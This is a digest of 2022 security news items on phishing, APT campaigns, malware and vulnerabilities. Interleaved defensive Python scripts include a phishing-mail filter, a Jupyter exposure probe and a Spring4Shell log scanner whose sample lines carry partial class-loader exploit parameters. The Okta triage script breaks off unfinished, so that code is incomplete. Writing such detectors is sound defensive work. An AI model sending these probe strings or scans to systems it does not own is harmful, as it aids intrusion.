    Tens of thousands of victims have been tricked into clicking on an email claiming to contain a WhatsApp voicemail message, according to researchers. A team at Armorblox has already detected close to 28,000 mailboxes impacted across Google Workspace and Microsoft 365. The email in question is titled “New Incoming Voicemessage,” with the body text spoofed to appear as if a private message has been sent via WhatsApp to the recipient. To view the secure message, victims are asked to click on an embedded button labelled “play.” Clicking the button redirects the victim to a webpage that attempts to install the JS/Kryptik Trojan.
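
    A mail-filter check for the lure described above, added here as an example; it is not code from Armorblox or from the original article. The three messages at the bottom are constructed. It assumes that genuine WhatsApp mail comes from a whatsapp.com or whatsapp.net sender and links only to those domains, so a voicemail notice that claims to be from WhatsApp but is sent from, or links to, any other domain is treated as the lure; an ordinary PBX voicemail notice that never mentions WhatsApp is left alone.

```python
"""Flag e-mails built on the WhatsApp 'voice message' lure.

Added example, not code from Armorblox or the original article. The three
messages at the bottom are constructed. Assumptions: genuine WhatsApp mail
comes from a whatsapp.com or whatsapp.net sender and links only to those
domains; a voicemail notice that claims to be from WhatsApp but is sent
from, or links to, any other domain is treated as the lure.
"""
import re
from email import message_from_string
from email.message import Message
from urllib.parse import urlparse

LEGIT_DOMAINS = ("whatsapp.com", "whatsapp.net")                   # assumed allow-list
LURE_SUBJECT = re.compile(r"voice\s*-?\s*message", re.IGNORECASE)  # "Voicemessage", "voice message"
HREF = re.compile(r"""href=["']([^"']+)["']""", re.IGNORECASE)
BARE_URL = re.compile(r"""https?://[^\s<>"']+""")


def trusted(host: str) -> bool:
    """True when host is one of the allow-listed domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)


def sender_domain(msg: Message) -> str:
    """Domain of the From: address, or '' when there is none."""
    found = re.search(r"@([\w.-]+)", msg.get("From", ""))
    return found.group(1).lower() if found else ""


def body_text(msg: Message) -> str:
    """Decoded text/plain and text/html parts, joined."""
    chunks = []
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def link_domains(text: str) -> set:
    """Hostnames of every href= and bare URL in the body."""
    hosts = set()
    for url in HREF.findall(text) + BARE_URL.findall(text):
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def is_voicemail_lure(raw: str) -> bool:
    msg = message_from_string(raw)
    if not LURE_SUBJECT.search(msg.get("Subject", "")):
        return False
    text = body_text(msg)
    if "whatsapp" not in text.lower():
        return False                        # an ordinary PBX voicemail notice
    # Only mail both sent from and linking to WhatsApp's own domains passes.
    if trusted(sender_domain(msg)) and all(trusted(h) for h in link_domains(text)):
        return False
    return True


def lure_report(raw: str) -> dict:
    """Verdict plus the evidence it rests on, for a triage queue."""
    msg = message_from_string(raw)
    return {"sender": sender_domain(msg),
            "links": sorted(link_domains(body_text(msg))),
            "lure": is_voicemail_lure(raw)}


# Constructed samples: the lure, a message that passes the allow-list, a PBX notice.
PHISH = (
    "From: WhatsApp Notifier <alerts@voicemail-center.example>\n"
    "To: victim@corp.example\n"
    "Subject: New Incoming Voicemessage\n"
    "Content-Type: text/html; charset=utf-8\n"
    "\n"
    "<p>You have a new private message on WhatsApp (0:27).</p>\n"
    '<a href="https://cdn-media.example/play?id=7731">Play</a>\n'
)
GENUINE_STYLE = (
    "From: WhatsApp <no-reply@whatsapp.com>\n"
    "To: victim@corp.example\n"
    "Subject: New voice message\n"
    "Content-Type: text/html; charset=utf-8\n"
    "\n"
    '<p>Open WhatsApp to listen: <a href="https://www.whatsapp.com/download">WhatsApp</a></p>\n'
)
PBX_NOTICE = (
    "From: Voicemail <pbx@corp.example>\n"
    "To: victim@corp.example\n"
    "Subject: New voice message from ext. 204\n"
    "Content-Type: text/plain; charset=utf-8\n"
    "\n"
    "Duration 0:14. Listen at https://pbx.corp.example/vm/204\n"
)

if __name__ == "__main__":
    for name, raw in (("phish", PHISH), ("genuine", GENUINE_STYLE), ("pbx", PBX_NOTICE)):
        print(name, lure_report(raw))
```

    The allow-list is the weak point of this check: a sender that passes SPF/DKIM for whatsapp.com is a different question from a From: header that merely says so, and a production filter should gate the trusted path on authentication results rather than on the header text alone.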

    Researchers Trace Widespread Espionage Attacks Back to Chinese 'Cicada' Hackers

    A Chinese state-backed advanced persistent threat (APT) group known for singling out Japanese entities has been attributed to a new long-running espionage campaign targeting new geographies, suggesting a "widening" of the threat actor's targeting. The widespread intrusions, which are believed to have commenced at the earliest in mid-2021 and continued as recently as February 2022, have been tied to a group tracked as Cicada, which is also known as APT10, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team.

    Ukraine Spots Russian-linked 'Armageddon' Phishing Attacks

    The Computer Emergency Response Team of Ukraine (CERT-UA) has spotted new phishing attempts attributed to the Russian threat group tracked as Armageddon (Gamaredon). The malicious emails attempt to trick the recipients with lures themed after the war in Ukraine and infect the target systems with espionage-focused malware.

    These Ten Hacking Groups Have Been Targeting Critical Infrastructure and Energy

    Electricity, oil and gas, and other critical infrastructure vital to our everyday lives are increasingly at risk from cyber attackers who know that successfully compromising industrial control systems (ICS) and operational technology (OT) can enable them to disrupt or tamper with vital services. A report from cybersecurity company Dragos details ten different hacking operations known to have actively targeted industrial systems in North America and Europe, and it warns that this activity is likely to grow in the next 12 months.

    New Borat Remote Access Malware Is No Laughing Matter

    A new remote access trojan (RAT) named Borat has appeared on darknet markets, offering easy-to-use features to conduct DDoS attacks, UAC bypass, and ransomware deployment. As a RAT, Borat enables remote threat actors to take complete control of their victim’s mouse and keyboard, access files and network resources, and hide any signs of their presence. The malware lets its operators choose their compilation options to create small payloads that feature precisely what they need for highly tailored attacks.

    Hackers breach MailChimp's Internal Tools to Target Crypto Customers

    Email marketing firm MailChimp disclosed on Sunday that it had been hit by hackers who gained access to internal customer support and account management tools to steal audience data and conduct phishing attacks. Sunday morning, Twitter was abuzz with reports from owners of Trezor hardware cryptocurrency wallets who received phishing notifications claiming that the company had suffered a data breach. These emails prompted Trezor customers to reset their hardware wallet PINs by downloading malicious software that stole the stored cryptocurrency.

    NSA Employee Accused of Sharing National Defense Secrets

    An employee of the United States National Security Agency (NSA) has been accused of sending national defense secrets from his personal email account. A 26-count indictment unsealed Thursday in the District of Maryland alleges that 60-year-old Mark Robert Unkenholz willfully transmitted classified National Defense Information (NDI) on 13 occasions between February 14 2018 and June 1 2020.

    FIN7 Hackers Evolve Toolset, Work with Multiple Ransomware Gangs

    Threat analysts have compiled a detailed technical report on FIN7 operations from late 2021 to early 2022, showing that the adversary continues to be very active, evolving, and trying new monetization methods. FIN7 (a.k.a. Carbanak) is a Russian-speaking, financially motivated actor known for its resourceful and diverse set of tactics, custom-made malware, and stealthy backdoors. Although some members of the group were indicted in 2018, followed by the sentencing of one of its managers in 2021, FIN7 did not disappear and kept developing new tools for stealthy attacks.

    Experts Discovered 15-Year-Old Vulnerabilities in the PEAR PHP Repository

    Researchers from SonarSource discovered two 15-year-old security flaws in the PEAR (PHP Extension and Application Repository) repository that could have enabled supply chain attacks. PEAR is a framework and distribution system for reusable PHP components (Security Affairs, 2022). The vulnerability has been deemed critical because it can easily be exploited by a low-skilled threat actor and resides in a central component of the PHP supply chain. Using the vulnerability, an attacker could take over any developer account and even publish malicious releases.

    3CX Phone Management System

    Security researcher "frycos" has published details of an alleged vulnerability impacting the 3CX Phone Management System. "3CX is an open-platform office phone system that runs on premise on Windows or Linux, with the option to migrate to cloud with a simple backup and restore." (3CX). The software is typically installed on-premise and is a VoIP solution for collaborative communication.

    Zyxel Patches Critical Bug Affecting Firewall and VPN Devices

    Network equipment company Zyxel has updated the firmware of several of its business-grade firewall and VPN products to address a critical-severity vulnerability that could give attackers administrator-level access to affected devices. Zyxel’s security advisory refers to products from the USG/ZyWALL, USG FLEX, ATP, VPN, and NSG (Nebula Security Gateway) series. Tracked as CVE-2022-0342, the vulnerability if exploited allows an unauthenticated attacker to gain administrative access to impacted Zyxel devices.

    Critical Bugs in Rockwell PLC Could Allow Hackers to Implant Malicious Code

    Two new security vulnerabilities have been disclosed in Rockwell Automation's programmable logic controllers (PLCs) and engineering workstation software that could be exploited by an attacker to inject malicious code on affected systems and stealthily modify automation processes. The flaws have the potential to disrupt industrial operations and cause physical damage to factories in a manner similar to that of Stuxnet and the Rogue7 attacks, operational technology security company Claroty said.

    Apple Rushes Out Patches for 0-Days in MacOS, iOS

    Apple rushed out patches for two zero-days affecting macOS and iOS Thursday, both of which are likely under active exploitation and could allow a threat actor to disrupt or access kernel activity. Apple released separate security updates for the bugs – a vulnerability affecting both macOS and iOS tracked as CVE-2022-22675 and a macOS flaw tracked as CVE-2022-22674. Their discovery was attributed to an anonymous researcher. CVE-2022-22675 – found in the AppleAVD component present in both macOS and iOS – could allow an application to execute arbitrary code with kernel privileges, according to the advisory.

    AcidRain, A Wiper That Crippled Routers and Modems in Europe

    Security researchers at SentinelLabs have spotted a previously undetected destructive wiper, tracked as AcidRain, that hit routers and modems and is suspected of being linked to the Viasat KA-SAT attack of February 24, 2022. That attack on the KA-SAT network left thousands of modems across Europe unreachable. AcidRain issues destructive commands that overwrite key data in flash memory; the modems were then unable to access the network, but were not permanently damaged.

    Meet BlackGuard: A New Infostealer Peddled on Russian Hacker Forums

    Researchers have uncovered a new infostealer malware being peddled in Russian underground forums. Dubbed BlackGuard, the new strain is "sophisticated," Zscaler says, and has been made available to criminal buyers for a monthly price of $200. Infostealers are forms of malware designed to harvest valuable data, potentially including operating system information, contact lists, screenshots, network traffic, and online account credentials, including those used to access financial services and banking.

    New Python-based Ransomware Targeting JupyterLab Web Notebooks

    Researchers have disclosed what they say is the first-ever Python-based ransomware strain specifically designed to target exposed Jupyter notebooks, a web-based interactive computing platform that allows editing and running programs via a browser. While access to the application is normally restricted, these notebooks are sometimes left exposed to the internet with no authentication, allowing anyone to access the notebook.
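
    A quick way to test for the exposure described above, added here as an example; it is not code from the original article or from the Jupyter project. It assumes that a Jupyter server with token or password authentication answers an unauthenticated request to /api/contents with HTTP 403, while a server started with authentication disabled (for instance --ServerApp.token='') answers 200 with a JSON directory listing, which is the open door the ransomware walks through. The two responses at the bottom are constructed so the classification runs offline; probe() is the same check against a live host.

```python
"""Check whether a Jupyter server hands out its file listing without a token.

Added example, not from the original article or the Jupyter project.
Assumption: with token or password auth enabled, an unauthenticated request
to /api/contents gets HTTP 403; a server started with auth disabled
(e.g. --ServerApp.token='') answers 200 with a JSON directory listing.
The two responses at the bottom are constructed so the check runs offline.
"""
import json
import urllib.error
import urllib.request


def classify(status: int, body: bytes) -> str:
    """Turn an /api/contents response into an exposure verdict."""
    if status == 200:
        try:
            listing = json.loads(body)
        except ValueError:
            return "unknown"           # 200 but not Jupyter's JSON: some other service
        if isinstance(listing, dict) and listing.get("type") == "directory":
            return "exposed"           # root listing served with no credentials at all
        return "unknown"
    if status in (401, 403):
        return "auth-required"
    if 300 <= status < 400:
        return "auth-required"         # bounced to /login
    return "unknown"


def probe(base_url: str, timeout: float = 5.0) -> str:
    """Fetch /api/contents with no token and classify what comes back."""
    url = base_url.rstrip("/") + "/api/contents"
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read())
    except urllib.error.HTTPError as err:
        return classify(err.code, err.read())
    except (urllib.error.URLError, OSError):
        return "unreachable"


# Constructed responses standing in for an open and a locked-down server.
OPEN_SERVER = (200, b'{"name":"","path":"","type":"directory","content":[]}')
LOCKED_SERVER = (403, b'{"message":"Forbidden"}')

if __name__ == "__main__":
    print("open:", classify(*OPEN_SERVER))       # exposed
    print("locked:", classify(*LOCKED_SERVER))   # auth-required
    # Against a real host: print(probe("http://127.0.0.1:8888"))
```

    An "exposed" verdict means anyone who can reach the port can list, read, write and execute notebooks; the fix is to bind the server to localhost or put it behind an authenticating proxy and keep the token or password enabled, not to rely on the port being hard to guess.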

    NATO Countries Targeted in Russian Phishing Attacks, Google Reports

    According to the Google Threat Analysis Group (TAG), a growing number of threat actors are exploiting the Russian invasion of Ukraine to launch phishing and malware attacks against Eastern European and NATO countries. The attacks also target Ukraine. The report highlights credential phishing by a Russia-based group known as COLDRIVER against a NATO Center of Excellence and Eastern European forces. A Ukrainian defense contractor and several US-based non-governmental organizations (NGOs) and think tanks were also among the targets of Russian threat actors.

    Mysterious Disclosure of a Zero-day RCE Flaw Spring4Shell in Spring

    Researchers disclosed a zero-day vulnerability, dubbed Spring4Shell, in the Spring Core Java framework. An unauthenticated, remote attacker could trigger the vulnerability to execute arbitrary code on the target system. The framework is maintained by VMware. The Spring Framework is an application framework and inversion-of-control container for the Java platform. Its core features can be used by any Java application, and there are extensions for building web applications on top of the Java EE (Enterprise Edition) platform.
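
    A log check for exploitation attempts, added here as an example; it is not code from the original article or from the Spring project. It keys on the published indicator for this bug (CVE-2022-22965): request parameters that reach into the bean's class loader through Spring's data binding, of the form class.module.classLoader... or class.classLoader.... The log lines are constructed and assume the Apache/Nginx combined format. One caveat a practitioner needs: an access log records only the query string, so a probe sent in a POST body is invisible to this check and needs request-body logging or a WAF to be seen.

```python
"""Scan web-server access logs for Spring4Shell (CVE-2022-22965) probes.

Added example, not from the original article or the Spring project. It keys
on the published indicator: parameters that reach the bean's class loader
(class.module.classLoader..., class.classLoader...). Log lines are
constructed, in Apache/Nginx combined format. Access logs hold only the
query string, so probes carried in a POST body are not seen here.
"""
import re
from urllib.parse import unquote

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Applied to the URL-decoded query string, so %2E-encoded dots and odd casing
# do not evade it. A parameter *name* must start with the class-loader path;
# a value that merely contains the word "class" is not a hit.
INDICATOR = re.compile(r'(?:^|&)class\.(?:module\.)?classloader\b', re.IGNORECASE)


def parse(line: str):
    """Split one combined-format line into fields, or None if it is not one."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def decoded_target(rec: dict) -> str:
    """Decode twice: scanners sometimes double-encode to slip past naive filters."""
    return unquote(unquote(rec["target"]))


def is_spring4shell_probe(line: str) -> bool:
    rec = parse(line)
    if rec is None:
        return False
    query = decoded_target(rec).partition("?")[2]
    return bool(INDICATOR.search(query))


def scan(lines):
    """Return (ip, method, decoded target) for every line that looks like a probe."""
    hits = []
    for line in lines:
        if is_spring4shell_probe(line):
            rec = parse(line)
            hits.append((rec["ip"], rec["method"], decoded_target(rec)))
    return hits


# Constructed sample log: two probes (one percent-encoded), one benign request, one junk line.
LOGS = [
    '203.0.113.9 - - [31/Mar/2022:10:21:07 +0000] "GET /app/greet?class.module.classLoader.resources.context.parent.pipeline.first.prefix=probe HTTP/1.1" 200 512',
    '203.0.113.9 - - [31/Mar/2022:10:21:08 +0000] "GET /app/greet?class%2Emodule%2EclassLoader%2Eresources%2Econtext%2Eparent%2Epipeline%2Efirst%2Esuffix=.jsp HTTP/1.1" 200 512',
    '198.51.100.4 - - [31/Mar/2022:10:22:41 +0000] "GET /app/greet?name=classroom&class.size=30 HTTP/1.1" 200 128',
    'not a log line',
]

if __name__ == "__main__":
    for ip, method, target in scan(LOGS):
        print(f"{ip} {method} {target}")
```

    A hit with a 200 status is worth treating as a possible success rather than just a scan: the vulnerable binding path does not error out, so the response code alone does not tell you whether the write landed.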

    CISA and the DOE Release: Mitigating Attacks Against Uninterruptible Power Supply Devices

    According to a PDF released by the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy, the agencies are aware of threat actors gaining access to a variety of internet-connected uninterruptible power supply (UPS) devices, often through unchanged default usernames and passwords. In recent years, UPS vendors have added Internet of Things capabilities, and UPSs are routinely attached to networks for power monitoring, routine maintenance, and/or convenience.

    Researchers Expose Mars Stealer Malware Campaign Using Google Ads to Spread

    A nascent information stealer called Mars has been observed in campaigns that take advantage of cracked versions of the malware to steal information stored in web browsers and cryptocurrency wallets. "Mars Stealer is being distributed via social engineering techniques, malspam campaigns, malicious software cracks, and keygens," Morphisec malware researcher Arnold Osipov said in a report published Tuesday.

    Phishing Campaign Targets Russian Govt Dissidents With Cobalt Strike

    A new spear phishing campaign is taking place in Russia targeting dissenters with opposing views to those promoted by the state and national media about the war against Ukraine. The campaign targets government employees and public servants with emails warning of the software tools and online platforms that are forbidden in the country. The messages come with a malicious attachment or link embedded in the body that is dropping a Cobalt Strike beacon to the recipient's system, enabling remote operators to conduct espionage on the target.

    Viasat Shares Details on KA-SAT Satellite Service Cyberattack

    US satellite communications provider Viasat has shared an incident report regarding the cyberattack that affected its KA-SAT consumer-oriented satellite broadband service on February 24, the day Russia invaded Ukraine. Today's incident report comes after the KA-SAT satellite network — "used intensively by the Ukrainian military" — was affected by a cyberattack that triggered satellite service outages in Central and Eastern Europe.

    Personal Data of 620 FSB Officers Published Online

    The Ukrainian Defense Ministry’s Directorate of Intelligence has published what it claims is the personal data of hundreds of Russian intelligence officers online. The data, which was published on Monday, contains the names, addresses and phone numbers of 620 individuals who Ukraine asserts to be officers of Russia’s Federal Security Service (FSB) involved in “criminal activities” in Europe. Ukraine said the alleged FSB officers on the list are registered as living in Lubyanka – the agency’s headquarters in Moscow.

    CISA and DOE Publish Cybersecurity Guidance To Protect UPS Devices

    The Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy (DOE) are aware of threat actors gaining access to a variety of internet-connected uninterruptible power supply (UPS) devices, often through unchanged default usernames and passwords. In a CISA and DOE Insights, organizations are provided with recommended actions to mitigate attacks against UPS devices.

    Ukraine Destroys Five Bot Farms That Were Spreading 'Panic' Among Citizens

    The Security Service of Ukraine (SBU) has destroyed five "enemy" bot farms engaged in activities to frighten Ukrainian citizens. In a March 28 release, the SBU said that the bot farms had an overall capacity of at least 100,000 accounts spreading misinformation and fake news surrounding Russia's invasion of Ukraine, which started on February 24 and has now lasted over a month.

    Hacked WordPress Sites Force Visitors to DDoS Ukrainian Targets

    Hackers are compromising WordPress sites to insert a malicious script that uses visitors' browsers to perform distributed denial-of-service attacks on Ukrainian websites. Today, MalwareHunterTeam discovered a WordPress site compromised to use this script, targeting ten websites with Distributed Denial of Service (DDoS) attacks. These websites include Ukrainian government agencies, think tanks, recruitment sites for the International Legion of Defense of Ukraine, financial sites, and other pro-Ukrainian sites.

    Critical SonicWall Firewall Patch Not Released for All Devices

    Security hardware manufacturer SonicWall has fixed a critical vulnerability in the SonicOS security operating system that allows denial of service (DoS) attacks and could lead to remote code execution (RCE). The security flaw is a stack-based buffer overflow weakness with a 9.4 CVSS severity score and impacting multiple SonicWall firewalls.

    Microsoft Exchange Targeted For IcedID Reply-chain hijacking Attacks

    The distribution of the IcedID malware has seen a spike recently due to a new campaign that hijacks existing email conversation threads and injects malicious payloads that are hard to spot. IcedID is a modular banking trojan first spotted back in 2017, used mainly to deploy second-stage malware such as other loaders or ransomware. Its operators are believed to be initial access brokers who compromise networks and then sell the access to other cybercriminals.

    Emergency Google Chrome Update Fixes Zero-day Used in Attacks

    Google has released Chrome 99.0.4844.84 for Windows, Mac, and Linux users to address a high-severity zero-day bug exploited in the wild. "Google is aware that an exploit for CVE-2022-1096 exists in the wild," the browser vendor said in a security advisory published on Friday. The 99.0.4844.84 version is already rolling out worldwide in the Stable Desktop channel, and Google says it might be a matter of weeks until it reaches the entire userbase.

    Sophos Patches Critical Remote Code Execution Vulnerability in Firewall

    Sophos has patched a remote code execution (RCE) vulnerability in the Firewall product line. Sophos Firewall is an enterprise cybersecurity solution that can adapt to different networks and environments. Firewall includes TLS and encrypted network traffic inspection, deep packet inspection, sandboxing, intrusion prevention systems (IPSs), and visibility features for detecting suspicious and malicious network activity. On March 25, the cybersecurity company disclosed the RCE, which was privately disclosed to Sophos via the firm's bug bounty program by an external cybersecurity researcher.

    Hive Ransomware Ports its Linux VMware ESXi Encryptor to Rust

    The Hive ransomware operation has ported its VMware ESXi Linux encryptor to the Rust programming language and added new features that make it harder for security researchers to snoop on victims' ransom negotiations. As enterprises become increasingly reliant on virtual machines to save computing resources, consolidate servers, and simplify backups, ransomware gangs are creating dedicated encryptors that target these platforms. Ransomware gangs' Linux encryptors typically target VMware ESXi, the virtualization platform most commonly used in the enterprise.

    Russia Facing Internet Outages Due to Equipment Shortage and Loss of IT Talent

    Russia's RSPP Commission for Communications and IT, part of the country's largest entrepreneurship union, has warned of imminent large-scale Internet service outages due to the lack of available telecom equipment. To raise awareness, the commission has compiled a document that reflects the practical challenges facing the industry in Russia at this time and also presents a set of proposals specifically crafted to alleviate them. Russian media that have seen the document say that the warning is dire, as the commission highlights that telecom operators' equipment reserves will only last for another six months.

    UK Police Arrested 7 Alleged Members of Lapsus$ Extortion Gang

    The City of London Police announced that it had arrested seven teenagers suspected of being members of the notorious Lapsus$ extortion gang, which is believed to be based in South America. “Four researchers investigating the hacking group Lapsus$, on behalf of companies that were attacked, said they believe the teenager is the mastermind,” states Bloomberg, which first reported the news. “Lapsus$ has befuddled cybersecurity experts as it has embarked on a rampage of high-profile hacks.”

    U.S. Charges 4 Russian Govt. Employees Over Hacking Critical Infrastructure Worldwide

    The U.S. government on Thursday released a cybersecurity advisory outlining multiple intrusion campaigns conducted by state-sponsored Russian cyber actors from 2011 to 2018 that targeted the energy sector in the U.S. and beyond. "The [Federal Security Service] conducted a multi-stage campaign in which they gained remote access to U.S. and international Energy Sector networks, deployed ICS-focused malware, and collected and exfiltrated enterprise and ICS-related data," the U.S. government said, attributing the attacks to an APT actor known as Energetic Bear.

    Western Digital My Cloud OS Update Fixes Critical Vulnerability

    Western Digital has released new My Cloud OS firmware to fix a vulnerability exploited by bug hunters during the Pwn2Own 2021 hacking competition to achieve remote code execution. The flaw, tracked as CVE-2022-23121, was exploited by the NCC Group’s EDG team members and relied on the open-source service named “Netatalk Service” that was included in My Cloud OS. The vulnerability, which has a CVSS v3 severity score of 9.8, allows remote attackers to execute arbitrary code on the target device, in this case, WD PR4100 NAS, without requiring authentication.

    Honda Bug Lets a Hacker Unlock and Start Your Car via Replay Attack

    Researchers have disclosed a 'replay attack' vulnerability affecting select Honda and Acura car models that allows a nearby hacker to unlock your car and even start its engine from a short distance. The attack consists of a threat actor capturing the RF signals sent from your key fob to the car and resending these signals to take control of your car's remote keyless entry system. The vulnerability, according to researchers, remains largely unfixed in older models, but Honda owners may be able to take some action to protect themselves against this attack.

    VMware Issues Patches for Critical Flaws Affecting Carbon Black App Control

    On Wednesday, the cloud computing company VMware released software updates to patch two critical security vulnerabilities affecting its Carbon Black App Control platform. The vulnerabilities, if exploited, could be abused by threat actors to execute arbitrary code on affected installations on Windows systems. VMware Carbon Black App Control is an application allowlisting solution designed to enable security operations teams to lock down servers and critical systems, prevent unwanted changes, and ensure continuous compliance with regulatory mandates.

    North Korean Hackers Exploit Chrome zero-day Weeks Before Patch

    North Korean state hackers have exploited a zero-day, remote code execution vulnerability in Google Chrome web browser for more than a month before a patch became available, in attacks targeting news media, IT companies, cryptocurrency, and fintech organizations. Google’s Threat Analysis Group (TAG) attributed two campaigns exploiting the recently patched CVE-2022-0609 (described only as “use after free in Animation” at the moment) to two separate attacker groups backed by the North Korean government.

    Malicious NPM Packages Target Azure Developers to Steal Personal Data

    A "large scale" attack is targeting Microsoft Azure developers through malicious npm packages. On Wednesday, cybersecurity researchers from JFrog said that hundreds of malicious packages have been identified, created to steal valuable personally identifiable information (PII) from developers. The miscreants responsible for the npm repositories have developed an automated script that targets the @azure npm scope, alongside @azure-rest, @azure-tests, @azure-tools, and @cadl-lang.

    Ukrainian Enterprises Hit with the DoubleZero Wiper

    Ukraine's CERT-UA continues to observe malware-based attacks aimed at Ukrainian organizations; in a recent alert it warned of attacks employing a wiper dubbed DoubleZero. The campaign was first spotted by CERT-UA on March 17, after it saw threat actors targeting users with malicious spear-phishing attacks. DoubleZero is an obfuscated .NET program that can be used to destroy files on infected systems.

    Anonymous Hacked Nestlé and Leaked 10 GB of Sensitive Data

    Yesterday, the popular Anonymous hacktivist collective announced on Twitter that it hacked Nestlé, the largest food company in the world. Anonymous recently declared war on all companies that continue to operate in Russia by paying taxes to the Russian government. On March 20, the group stated that it would give the companies 48 hours to withdraw from Russia. Any company that failed to comply would become a target of the hacktivist group.

    Hackers Exploit New WPS Office Flaw to Breach Betting Firms

    An unknown Chinese-speaking threat actor has been targeting betting companies in Taiwan, Hong Kong, and the Philippines, leveraging a vulnerability in WPS Office to plant a backdoor on the targeted systems. The adversary appears to be sophisticated, and its toolset features code similarities to APT group backdoors analyzed in two 2015 and 2017 reports by Palo Alto and BlackBerry, respectively. The newest campaign was spotted by researchers at Avast, who have sampled several malware tools from the threat actors, who have compiled a rich, modular toolset.

    Custom macOS Malware of Chinese Hackers ‘Storm Cloud’ Exposed

    Researchers have discovered a previously unknown macOS malware variant called GIMMICK, which is believed to be a custom tool used by a Chinese espionage threat actor known as 'Storm Cloud.' The malware was discovered by researchers at Volexity, who retrieved it from the RAM of a MacBook Pro running macOS 11.6 (Big Sur), which was compromised in a late 2021 cyberespionage campaign. GIMMICK is a multi-platform family that uses public cloud hosting services such as Google Drive for command-and-control (C2) channels. The malware is written primarily in Objective-C, with Windows versions written in both .NET and Delphi. Despite the differences in programming languages used, Volexity has tracked the malware under the same name due to the shared C2 architecture, file paths, and behavioral patterns used by all variants.

    Lapsus$ Gang Compromised a Microsoft Employee’s Account

    Microsoft confirmed that the Lapsus$ extortion group has hacked one of its employees to access and steal the source code of some projects. Yesterday the cybercrime gang leaked 37GB of source code stolen from Microsoft's Azure DevOps server. On Sunday, the Lapsus$ gang announced that it had compromised Microsoft's Azure DevOps server and shared a screenshot of alleged internal source code repositories. The gang claims to have leaked the source code for some Microsoft projects, including Bing and Cortana.

    Android App With 100,000 Downloads Contained Password-stealing Malware, Say Security Researchers

    Google has removed an app with over 100,000 downloads from its Play Store after security researchers warned that the app was able to harvest the Facebook credentials of smartphone users. Researchers at French mobile security firm Pradeo said the app embeds Android trojan malware known as "Facestealer" because it dupes victims into typing their Facebook credentials into a web page that transmits the credentials to the attacker's server, which happens to be a domain that was registered in Russia.

    Hundreds of HP Printer Models Vulnerable to Remote Code Execution

    HP has published security advisories for three critical-severity vulnerabilities affecting hundreds of its LaserJet Pro, Pagewide Pro, OfficeJet, Enterprise, Large Format, and DeskJet printer models. The three vulnerabilities are tracked as CVE-2022-24291 (high severity score: 7.5), CVE-2022-24292 (critical severity score: 9.8), and CVE-2022-24293 (critical severity score: 9.8). While not many details about these vulnerabilities have been published, they could be exploited for information disclosure, remote code execution, and denial of service.

    BitRAT Malware Now Spreading as a Windows 10 License Activator

    A new BitRAT malware distribution campaign is underway, exploiting users looking to activate pirated Windows OS versions for free using unofficial Microsoft license activators. BitRAT is a powerful remote access trojan sold on cybercrime forums and dark web markets for as low as $20 (lifetime access) to any cybercriminal who wants it. As such, each buyer follows their own approach to malware distribution, ranging from phishing, watering holes, or trojanized software.

    Okta Investigating Claims of Customer Data Breach from Lapsus$ Group - Additional Recommendations

    1. Collect and preserve all Okta logs. Focus on the Okta System Log, as it is the main audit trail for Okta activity; for details on this log see https://developer.okta.com/docs/reference/api/system-log/

    2. Search your audit log for suspicious activity. Focus on your superuser/admin Okta accounts, as they pose the largest risk.

    3. Rotate passwords for high-privileged accounts. At this stage it might be a bit early to rotate passwords for all users.

    4. If you outsource (parts of) your Okta deployment, check in with your vendor, establish which third-party admin accounts are used, and ask them for support.

    5. Check whether you currently have Okta support access enabled; you might want to disable it for the time being. More info: https://help.okta.com/oie/en-us/Content/Topics/Settings/settings-support-access.htm

    6. Check for (privileged) accounts created around the time of the suspected breach (21 January 2022).
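    Steps 2, 5 and 6 above can be run mechanically over a System Log export. The script below is an added example, not part of the original recommendations or of Okta's tooling: it loads a constructed System Log export (the accounts, timestamps and event ids are made up; the event type names user.lifecycle.create, user.account.privilege.grant and user.session.impersonation.initiate are Okta's own) and reports user creations within a window around 21 January 2022, admin role grants, and sessions opened through Okta Support access. The three-day window is an assumed default.

```python
"""Triage of Okta System Log events around a suspected compromise window.

Added example; the event records below are constructed for illustration and
are not real Okta data. Event type names follow Okta's System Log naming;
the pivot date (21 January 2022) comes from the recommendations above.
"""
import json
from datetime import datetime, timedelta, timezone

# Constructed sample export, trimmed to the fields this script reads.
# Timestamps straddle the 21 January 2022 pivot date.
SAMPLE_LOG = json.dumps([
    {"uuid": "e1", "published": "2022-01-20T22:10:05.000Z",
     "eventType": "user.lifecycle.create",
     "actor": {"alternateId": "support-vendor@example.com", "type": "User"},
     "target": [{"alternateId": "svc-backup@example.com", "type": "User"}],
     "outcome": {"result": "SUCCESS"}},
    {"uuid": "e2", "published": "2022-01-21T03:44:19.000Z",
     "eventType": "user.account.privilege.grant",
     "actor": {"alternateId": "support-vendor@example.com", "type": "User"},
     "target": [{"alternateId": "svc-backup@example.com", "type": "User"},
                {"displayName": "Super Administrator", "type": "Role"}],
     "outcome": {"result": "SUCCESS"}},
    {"uuid": "e3", "published": "2022-01-21T09:02:00.000Z",
     "eventType": "user.session.impersonation.initiate",
     "actor": {"alternateId": "okta-support@okta.com", "type": "User"},
     "target": [{"alternateId": "admin@example.com", "type": "User"}],
     "outcome": {"result": "SUCCESS"}},
    {"uuid": "e4", "published": "2022-02-15T11:30:00.000Z",
     "eventType": "user.lifecycle.create",
     "actor": {"alternateId": "hr-sync@example.com", "type": "User"},
     "target": [{"alternateId": "new.hire@example.com", "type": "User"}],
     "outcome": {"result": "SUCCESS"}},
    {"uuid": "e5", "published": "2022-01-22T08:00:00.000Z",
     "eventType": "user.session.start",
     "actor": {"alternateId": "admin@example.com", "type": "User"},
     "target": [],
     "outcome": {"result": "SUCCESS"}},
])

PIVOT = datetime(2022, 1, 21, tzinfo=timezone.utc)  # suspected breach date


def parse_log(text):
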